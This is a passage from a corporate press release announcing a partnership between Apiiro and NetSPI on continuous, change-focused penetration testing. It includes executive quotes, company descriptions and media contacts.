To keep pace with the speed of software development today, both companies advocate for running penetration tests in a smart and consistent way. Instead of performing pentests on a set schedule, they should be performed continuously as high risk changes are identified in an environment. Apiiro helps focus pentests on material changes to application and infrastructure code, enabling organizations to target their security processes. Through this contextual approach to application pentesting, customers can better automate the testing process and identify business-critical security vulnerabilities. 

“Apiiro is pleased to be joining forces with NetSPI to provide our customers with next-gen context aware pen-testing capabilities that will reduce the friction between pen-testers and development teams and help deliver secure products faster. ” said Idan Plotnik, CEO at Apiiro. “We were impressed by NetSPI’s ability to swiftly identify areas of critical vulnerabilities, and deliver high quality results that allow their customers to have peace of mind and focus on their business priorities.”

“Applications are the lifeblood of organizations today. As application development accelerates, the way we approach security testing needs to evolve,” said Aaron Shilts, President and CEO at NetSPI. “NetSPI and Apiiro are changing the way security teams approach penetration testing. By providing real-time visibility into application attack surface changes, we can better enable continuous and contextual testing to help clients find, fix, and remediate their vulnerabilities faster.”

About Apiiro

Apiiro is the industry’s first Code Risk Platform™ to provide Application Risk Management with every change, from design to code to cloud. Apiiro is re-inventing the secure development lifecycle for Agile and cloud-native development and gives organizations a 360° view of security and compliance risks, from design to production, across applications, infrastructure, developers’ knowledge, and business impact. Apiiro is backed by Greylock and Kleiner Perkins. www.apiiro.com

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on FacebookTwitter, and LinkedIn.

Apiiro Media Contact:
Kelly Hall
Offleash PR for Apiiro
apiiro@offleashpr.com

NetSPI Media Contact:
Tori Norris, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X